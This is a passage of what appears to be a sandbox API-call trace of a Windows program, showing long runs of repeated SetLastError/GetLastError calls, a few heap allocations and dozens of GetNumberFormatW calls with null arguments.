SetLastError (dwErrCode=0x0) [0055.539] GetLastError () returned 0x0 [0055.539] SetLastError (dwErrCode=0x0) [0055.539] GetLastError () returned 0x0 [0055.539] SetLastError (dwErrCode=0x0) [0055.539] GetLastError () returned 0x0 [0055.539] SetLastError (dwErrCode=0x0) [0055.539] GetLastError () returned 0x0 [0055.539] SetLastError (dwErrCode=0x0) [0055.539] GetLastError () returned 0x0 [0055.539] SetLastError (dwErrCode=0x0) [0055.539] GetLastError () returned 0x0 [0055.539] SetLastError (dwErrCode=0x0) [0055.539] GetLastError () returned 0x0 [0055.539] SetLastError (dwErrCode=0x0) [0055.539] GetLastError () returned 0x0 [0055.539] SetLastError (dwErrCode=0x0) [0055.539] GetLastError () returned 0x0 [0055.539] SetLastError (dwErrCode=0x0) [0055.539] GetLastError () returned 0x0 [0055.539] SetLastError (dwErrCode=0x0) [0055.539] GetLastError () returned 0x0 [0055.539] SetLastError (dwErrCode=0x0) [0055.540] GetLastError () returned 0x0 [0055.540] SetLastError (dwErrCode=0x0) [0055.540] GetLastError () returned 0x0 [0055.540] SetLastError (dwErrCode=0x0) [0055.540] GetLastError () returned 0x0 [0055.540] SetLastError (dwErrCode=0x0) [0055.540] GetLastError () returned 0x0 [0055.540] SetLastError (dwErrCode=0x0) [0055.540] GetLastError () returned 0x0 [0055.540] SetLastError (dwErrCode=0x0) [0055.540] GetLastError () returned 0x0 [0055.540] SetLastError (dwErrCode=0x0) [0055.540] GetLastError () returned 0x0 [0055.540] SetLastError (dwErrCode=0x0) [0055.540] GetLastError () returned 0x0 [0055.540] SetLastError (dwErrCode=0x0) [0055.540] GetLastError () returned 0x0 [0055.540] SetLastError (dwErrCode=0x0) [0055.540] GetLastError () returned 0x0 [0055.540] SetLastError (dwErrCode=0x0) [0055.540] GetLastError () returned 0x0 [0055.540] SetLastError (dwErrCode=0x0) [0055.540] GetLastError () returned 0x0 [0055.540] SetLastError (dwErrCode=0x0) [0055.540] GetLastError () returned 0x0 [0055.540] SetLastError (dwErrCode=0x0) [0055.540] GetLastError () returned 0x0 [0055.540] SetLastError (dwErrCode=0x0) [0055.540] GetLastError () returned 0x0 [0055.540] SetLastError (dwErrCode=0x0) [0055.540] GetLastError () returned 0x0 [0055.540] SetLastError (dwErrCode=0x0) [0055.540] GetLastError () returned 0x0 [0055.541] SetLastError (dwErrCode=0x0) [0055.541] GetLastError () returned 0x0 [0055.541] SetLastError (dwErrCode=0x0) [0055.541] GetLastError () returned 0x0 [0055.541] SetLastError (dwErrCode=0x0) [0055.541] GetLastError () returned 0x0 [0055.541] SetLastError (dwErrCode=0x0) [0055.541] GetLastError () returned 0x0 [0055.541] SetLastError (dwErrCode=0x0) [0055.541] GetLastError () returned 0x0 [0055.541] SetLastError (dwErrCode=0x0) [0055.541] GetLastError () returned 0x0 [0055.541] SetLastError (dwErrCode=0x0) [0055.541] GetLastError () returned 0x0 [0055.541] SetLastError (dwErrCode=0x0) [0055.541] GetLastError () returned 0x0 [0055.541] SetLastError (dwErrCode=0x0) [0055.541] GetLastError () returned 0x0 [0055.541] SetLastError (dwErrCode=0x0) [0055.541] GetLastError () returned 0x0 [0055.541] SetLastError (dwErrCode=0x0) [0055.541] GetLastError () returned 0x0 [0055.541] SetLastError (dwErrCode=0x0) [0055.541] GetLastError () returned 0x0 [0055.541] SetLastError (dwErrCode=0x0) [0055.541] GetLastError () returned 0x0 [0055.541] SetLastError (dwErrCode=0x0) [0055.541] GetLastError () returned 0x0 [0055.541] SetLastError (dwErrCode=0x0) [0055.541] GetLastError () returned 0x0 [0055.541] SetLastError (dwErrCode=0x0) [0055.541] GetLastError () returned 0x0 [0055.541] SetLastError (dwErrCode=0x0) [0055.541] GetLastError () returned 0x0 [0055.542] SetLastError (dwErrCode=0x0) [0055.542] GetLastError () returned 0x0 [0055.542] SetLastError (dwErrCode=0x0) [0055.542] GetLastError () returned 0x0 [0055.542] SetLastError (dwErrCode=0x0) [0055.542] GetLastError () returned 0x0 [0055.542] SetLastError (dwErrCode=0x0) [0055.542] GetLastError () returned 0x0 [0055.542] SetLastError (dwErrCode=0x0) [0055.542] GetLastError () returned 0x0 [0055.542] SetLastError (dwErrCode=0x0) [0055.542] GetLastError () returned 0x0 [0055.542] SetLastError (dwErrCode=0x0) [0055.542] GetLastError () returned 0x0 [0055.542] SetLastError (dwErrCode=0x0) [0055.542] GetLastError () returned 0x0 [0055.542] SetLastError (dwErrCode=0x0) [0055.542] GetLastError () returned 0x0 [0055.542] SetLastError (dwErrCode=0x0) [0055.542] GetLastError () returned 0x0 [0055.542] SetLastError (dwErrCode=0x0) [0055.542] GetLastError () returned 0x0 [0055.542] SetLastError (dwErrCode=0x0) [0055.542] GetLastError () returned 0x0 [0055.542] SetLastError (dwErrCode=0x0) [0055.542] GetLastError () returned 0x0 [0055.543] SetLastError (dwErrCode=0x0) [0055.543] GetLastError () returned 0x0 [0055.543] SetLastError (dwErrCode=0x0) [0055.543] GetLastError () returned 0x0 [0055.543] SetLastError (dwErrCode=0x0) [0055.543] GetLastError () returned 0x0 [0055.543] SetLastError (dwErrCode=0x0) [0055.543] GetLastError () returned 0x0 [0055.543] SetLastError (dwErrCode=0x0) [0055.543] GetLastError () returned 0x0 [0055.543] SetLastError (dwErrCode=0x0) [0055.543] GetLastError () returned 0x0 [0055.543] SetLastError (dwErrCode=0x0) [0055.543] GetLastError () returned 0x0 [0055.543] SetLastError (dwErrCode=0x0) [0055.543] GetLastError () returned 0x0 [0055.543] SetLastError (dwErrCode=0x0) [0055.543] GetLastError () returned 0x0 [0055.543] SetLastError (dwErrCode=0x0) [0055.543] GetLastError () returned 0x0 [0055.543] SetLastError (dwErrCode=0x0) [0055.543] GetLastError () returned 0x0 [0055.543] SetLastError (dwErrCode=0x0) [0055.543] GetLastError () returned 0x0 [0055.543] SetLastError (dwErrCode=0x0) [0055.543] GetLastError () returned 0x0 [0055.543] SetLastError (dwErrCode=0x0) [0055.543] GetLastError () returned 0x0 [0055.543] SetLastError (dwErrCode=0x0) [0055.543] GetLastError () returned 0x0 [0055.543] SetLastError (dwErrCode=0x0) [0055.543] GetLastError () returned 0x0 [0055.544] SetLastError (dwErrCode=0x0) [0055.544] GetLastError () returned 0x0 [0055.544] SetLastError (dwErrCode=0x0) [0055.544] GetLastError () returned 0x0 [0055.544] SetLastError (dwErrCode=0x0) [0055.544] GetLastError () returned 0x0 [0055.544] SetLastError (dwErrCode=0x0) [0055.544] GetLastError () returned 0x0 [0055.544] SetLastError (dwErrCode=0x0) [0055.544] GetLastError () returned 0x0 [0055.544] SetLastError (dwErrCode=0x0) [0055.544] GetLastError () returned 0x0 [0055.544] SetLastError (dwErrCode=0x0) [0055.544] GetLastError () returned 0x0 [0055.544] SetLastError (dwErrCode=0x0) [0055.544] GetLastError () returned 0x0 [0055.544] SetLastError (dwErrCode=0x0) [0055.544] GetLastError () returned 0x0 [0055.544] SetLastError (dwErrCode=0x0) [0055.544] GetLastError () returned 0x0 [0055.544] SetLastError (dwErrCode=0x0) [0055.544] GetLastError () returned 0x0 [0055.544] SetLastError (dwErrCode=0x0) [0055.544] GetLastError () returned 0x0 [0055.544] SetLastError (dwErrCode=0x0) [0055.544] GetLastError () returned 0x0 [0055.544] SetLastError (dwErrCode=0x0) [0055.544] GetLastError () returned 0x0 [0055.544] SetLastError (dwErrCode=0x0) [0055.544] GetLastError () returned 0x0 [0055.544] SetLastError (dwErrCode=0x0) [0055.544] GetLastError () returned 0x0 [0055.544] SetLastError (dwErrCode=0x0) [0055.545] GetLastError () returned 0x0 [0055.545] SetLastError (dwErrCode=0x0) [0055.545] GetLastError () returned 0x0 [0055.545] SetLastError (dwErrCode=0x0) [0055.545] GetLastError () returned 0x0 [0055.545] SetLastError (dwErrCode=0x0) [0055.545] GetLastError () returned 0x0 [0055.545] SetLastError (dwErrCode=0x0) [0055.545] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x8a) returned 0x750888 [0055.545] GetLastError () returned 0x0 [0055.545] SetLastError (dwErrCode=0x0) [0055.545] GetLastError () returned 0x0 [0055.545] SetLastError (dwErrCode=0x0) [0055.545] GetLastError () returned 0x0 [0055.545] SetLastError (dwErrCode=0x0) [0055.545] GetLastError () returned 0x0 [0055.545] SetLastError (dwErrCode=0x0) [0055.545] GetLastError () returned 0x0 [0055.545] SetLastError (dwErrCode=0x0) [0055.545] GetLastError () returned 0x0 [0055.545] SetLastError (dwErrCode=0x0) [0055.545] GetLastError () returned 0x0 [0055.545] SetLastError (dwErrCode=0x0) [0055.545] GetLastError () returned 0x0 [0055.545] SetLastError (dwErrCode=0x0) [0055.545] GetLastError () returned 0x0 [0055.545] SetLastError (dwErrCode=0x0) [0055.545] GetLastError () returned 0x0 [0055.545] SetLastError (dwErrCode=0x0) [0055.545] GetLastError () returned 0x0 [0055.545] SetLastError (dwErrCode=0x0) [0055.545] GetLastError () returned 0x0 [0055.545] SetLastError (dwErrCode=0x0) [0055.545] GetLastError () returned 0x0 [0055.546] SetLastError (dwErrCode=0x0) [0055.546] GetLastError () returned 0x0 [0055.546] SetLastError (dwErrCode=0x0) [0055.546] GetLastError () returned 0x0 [0055.546] SetLastError (dwErrCode=0x0) [0055.546] GetLastError () returned 0x0 [0055.546] SetLastError (dwErrCode=0x0) [0055.546] GetLastError () returned 0x0 [0055.546] SetLastError (dwErrCode=0x0) [0055.546] GetLastError () returned 0x0 [0055.546] SetLastError (dwErrCode=0x0) [0055.546] GetLastError () returned 0x0 [0055.546] SetLastError (dwErrCode=0x0) [0055.546] GetLastError () returned 0x0 [0055.546] SetLastError (dwErrCode=0x0) [0055.546] GetLastError () returned 0x0 [0055.546] SetLastError (dwErrCode=0x0) [0055.546] GetLastError () returned 0x0 [0055.546] SetLastError (dwErrCode=0x0) [0055.546] GetLastError () returned 0x0 [0055.546] SetLastError (dwErrCode=0x0) [0055.546] GetLastError () returned 0x0 [0055.546] SetLastError (dwErrCode=0x0) [0055.546] GetLastError () returned 0x0 [0055.546] SetLastError (dwErrCode=0x0) [0055.546] GetLastError () returned 0x0 [0055.546] SetLastError (dwErrCode=0x0) [0055.546] GetLastError () returned 0x0 [0055.546] SetLastError (dwErrCode=0x0) [0055.546] GetLastError () returned 0x0 [0055.546] SetLastError (dwErrCode=0x0) [0055.546] GetLastError () returned 0x0 [0055.546] SetLastError (dwErrCode=0x0) [0055.546] GetLastError () returned 0x0 [0055.547] SetLastError (dwErrCode=0x0) [0055.547] GetLastError () returned 0x0 [0055.547] SetLastError (dwErrCode=0x0) [0055.547] GetLastError () returned 0x0 [0055.547] SetLastError (dwErrCode=0x0) [0055.547] GetLastError () returned 0x0 [0055.547] SetLastError (dwErrCode=0x0) [0055.547] GetLastError () returned 0x0 [0055.547] SetLastError (dwErrCode=0x0) [0055.547] GetLastError () returned 0x0 [0055.547] SetLastError (dwErrCode=0x0) [0055.547] GetLastError () returned 0x0 [0055.547] SetLastError (dwErrCode=0x0) [0055.547] GetLastError () returned 0x0 [0055.547] SetLastError (dwErrCode=0x0) [0055.547] GetLastError () returned 0x0 [0055.547] SetLastError (dwErrCode=0x0) [0055.547] GetLastError () returned 0x0 [0055.547] SetLastError (dwErrCode=0x0) [0055.547] GetLastError () returned 0x0 [0055.547] SetLastError (dwErrCode=0x0) [0055.547] GetLastError () returned 0x0 [0055.547] SetLastError (dwErrCode=0x0) [0055.547] GetLastError () returned 0x0 [0055.547] SetLastError (dwErrCode=0x0) [0055.547] GetLastError () returned 0x0 [0055.547] SetLastError (dwErrCode=0x0) [0055.547] GetLastError () returned 0x0 [0055.547] SetLastError (dwErrCode=0x0) [0055.547] GetLastError () returned 0x0 [0055.547] SetLastError (dwErrCode=0x0) [0055.547] GetLastError () returned 0x0 [0055.547] SetLastError (dwErrCode=0x0) [0055.547] GetLastError () returned 0x0 [0055.548] SetLastError (dwErrCode=0x0) [0055.548] GetLastError () returned 0x0 [0055.548] SetLastError (dwErrCode=0x0) [0055.548] GetLastError () returned 0x0 [0055.548] SetLastError (dwErrCode=0x0) [0055.548] GetLastError () returned 0x0 [0055.548] SetLastError (dwErrCode=0x0) [0055.548] GetLastError () returned 0x0 [0055.548] SetLastError (dwErrCode=0x0) [0055.548] GetLastError () returned 0x0 [0055.548] SetLastError (dwErrCode=0x0) [0055.548] GetLastError () returned 0x0 [0055.548] SetLastError (dwErrCode=0x0) [0055.548] GetLastError () returned 0x0 [0055.548] SetLastError (dwErrCode=0x0) [0055.548] GetLastError () returned 0x0 [0055.548] SetLastError (dwErrCode=0x0) [0055.548] GetLastError () returned 0x0 [0055.548] SetLastError (dwErrCode=0x0) [0055.548] GetLastError () returned 0x0 [0055.548] SetLastError (dwErrCode=0x0) [0055.548] GetLastError () returned 0x0 [0055.548] SetLastError (dwErrCode=0x0) [0055.548] GetLastError () returned 0x0 [0055.548] SetLastError (dwErrCode=0x0) [0055.548] GetLastError () returned 0x0 [0055.548] SetLastError (dwErrCode=0x0) [0055.548] GetLastError () returned 0x0 [0055.548] SetLastError (dwErrCode=0x0) [0055.548] GetLastError () returned 0x0 [0055.548] SetLastError (dwErrCode=0x0) [0055.548] GetLastError () returned 0x0 [0055.548] SetLastError (dwErrCode=0x0) [0055.548] GetLastError () returned 0x0 [0055.549] SetLastError (dwErrCode=0x0) [0055.549] GetLastError () returned 0x0 [0055.549] SetLastError (dwErrCode=0x0) [0055.549] GetLastError () returned 0x0 [0055.549] SetLastError (dwErrCode=0x0) [0055.549] GetLastError () returned 0x0 [0055.549] SetLastError (dwErrCode=0x0) [0055.549] GetLastError () returned 0x0 [0055.549] SetLastError (dwErrCode=0x0) [0055.549] GetLastError () returned 0x0 [0055.549] SetLastError (dwErrCode=0x0) [0055.549] GetLastError () returned 0x0 [0055.549] SetLastError (dwErrCode=0x0) [0055.549] GetLastError () returned 0x0 [0055.549] SetLastError (dwErrCode=0x0) [0055.549] GetLastError () returned 0x0 [0055.549] SetLastError (dwErrCode=0x0) [0055.549] GetLastError () returned 0x0 [0055.549] SetLastError (dwErrCode=0x0) [0055.549] GetLastError () returned 0x0 [0055.549] SetLastError (dwErrCode=0x0) [0055.549] GetLastError () returned 0x0 [0055.549] SetLastError (dwErrCode=0x0) [0055.549] GetLastError () returned 0x0 [0055.549] SetLastError (dwErrCode=0x0) [0055.549] GetLastError () returned 0x0 [0055.549] SetLastError (dwErrCode=0x0) [0055.549] GetLastError () returned 0x0 [0055.549] SetLastError (dwErrCode=0x0) [0055.549] GetLastError () returned 0x0 [0055.549] SetLastError (dwErrCode=0x0) [0055.549] GetLastError () returned 0x0 [0055.549] SetLastError (dwErrCode=0x0) [0055.549] GetLastError () returned 0x0 [0055.550] SetLastError (dwErrCode=0x0) [0055.550] GetLastError () returned 0x0 [0055.550] SetLastError (dwErrCode=0x0) [0055.550] GetLastError () returned 0x0 [0055.550] SetLastError (dwErrCode=0x0) [0055.550] GetLastError () returned 0x0 [0055.550] SetLastError (dwErrCode=0x0) [0055.550] GetLastError () returned 0x0 [0055.550] SetLastError (dwErrCode=0x0) [0055.550] GetLastError () returned 0x0 [0055.550] SetLastError (dwErrCode=0x0) [0055.550] GetLastError () returned 0x0 [0055.550] SetLastError (dwErrCode=0x0) [0055.550] GetLastError () returned 0x0 [0055.550] SetLastError (dwErrCode=0x0) [0055.550] GetLastError () returned 0x0 [0055.550] SetLastError (dwErrCode=0x0) [0055.550] GetLastError () returned 0x0 [0055.550] SetLastError (dwErrCode=0x0) [0055.550] GetLastError () returned 0x0 [0055.550] SetLastError (dwErrCode=0x0) [0055.550] GetLastError () returned 0x0 [0055.550] SetLastError (dwErrCode=0x0) [0055.550] GetLastError () returned 0x0 [0055.550] SetLastError (dwErrCode=0x0) [0055.550] GetLastError () returned 0x0 [0055.550] SetLastError (dwErrCode=0x0) [0055.550] GetLastError () returned 0x0 [0055.550] SetLastError (dwErrCode=0x0) [0055.550] GetLastError () returned 0x0 [0055.550] SetLastError (dwErrCode=0x0) [0055.550] GetLastError () returned 0x0 [0055.550] SetLastError (dwErrCode=0x0) [0055.550] GetLastError () returned 0x0 [0055.551] SetLastError (dwErrCode=0x0) [0055.551] GetLastError () returned 0x0 [0055.551] SetLastError (dwErrCode=0x0) [0055.551] GetLastError () returned 0x0 [0055.551] SetLastError (dwErrCode=0x0) [0055.551] GetLastError () returned 0x0 [0055.551] SetLastError (dwErrCode=0x0) [0055.551] GetLastError () returned 0x0 [0055.551] SetLastError (dwErrCode=0x0) [0055.551] GetLastError () returned 0x0 [0055.551] SetLastError (dwErrCode=0x0) [0055.551] GetLastError () returned 0x0 [0055.551] SetLastError (dwErrCode=0x0) [0055.551] GetLastError () returned 0x0 [0055.551] SetLastError (dwErrCode=0x0) [0055.551] GetLastError () returned 0x0 [0055.551] SetLastError (dwErrCode=0x0) [0055.551] GetLastError () returned 0x0 [0055.551] SetLastError (dwErrCode=0x0) [0055.551] GetLastError () returned 0x0 [0055.551] SetLastError (dwErrCode=0x0) [0055.551] GetLastError () returned 0x0 [0055.551] SetLastError (dwErrCode=0x0) [0055.551] GetLastError () returned 0x0 [0055.551] SetLastError (dwErrCode=0x0) [0055.551] GetLastError () returned 0x0 [0055.551] SetLastError (dwErrCode=0x0) [0055.551] GetLastError () returned 0x0 [0055.551] SetLastError (dwErrCode=0x0) [0055.551] GetLastError () returned 0x0 [0055.551] SetLastError (dwErrCode=0x0) [0055.551] GetLastError () returned 0x0 [0055.551] SetLastError (dwErrCode=0x0) [0055.551] GetLastError () returned 0x0 [0055.552] SetLastError (dwErrCode=0x0) [0055.552] GetLastError () returned 0x0 [0055.552] SetLastError (dwErrCode=0x0) [0055.552] GetLastError () returned 0x0 [0055.552] SetLastError (dwErrCode=0x0) [0055.552] GetLastError () returned 0x0 [0055.552] SetLastError (dwErrCode=0x0) [0055.552] GetLastError () returned 0x0 [0055.552] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0055.552] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0x800) returned 0x752e80 [0055.552] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x405c62) returned 0x0 [0055.552] RtlSizeHeap (HeapHandle=0x740000, Flags=0x0, MemoryPointer=0x752df8) returned 0x80 [0055.552] RtlSizeHeap (HeapHandle=0x740000, Flags=0x0, MemoryPointer=0x752df8) returned 0x80 [0055.553] RtlSizeHeap (HeapHandle=0x740000, Flags=0x0, MemoryPointer=0x752df8) returned 0x80 [0055.553] RtlSizeHeap (HeapHandle=0x740000, Flags=0x0, MemoryPointer=0x752df8) returned 0x80 [0055.553] GetLastError () returned 0x0 [0055.553] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.554] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.554] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.554] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.554] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.554] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.554] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.554] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.554] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.554] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.554] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.554] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.554] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.554] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.554] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.554] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.554] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.554] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.554] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.554] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.554] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.554] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.554] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.554] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.554] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.554] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.554] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.554] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.554] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.554] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.554] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.554] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.554] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.554] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.554] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.554] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.554] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.554] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.555] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.555] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.555] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.555] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.555] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.555] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.555] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.555] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.555] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.555] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.555] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.555] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.555] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.555] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.555] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.555] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.555] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.555] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.555] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.555] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.555] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.555] 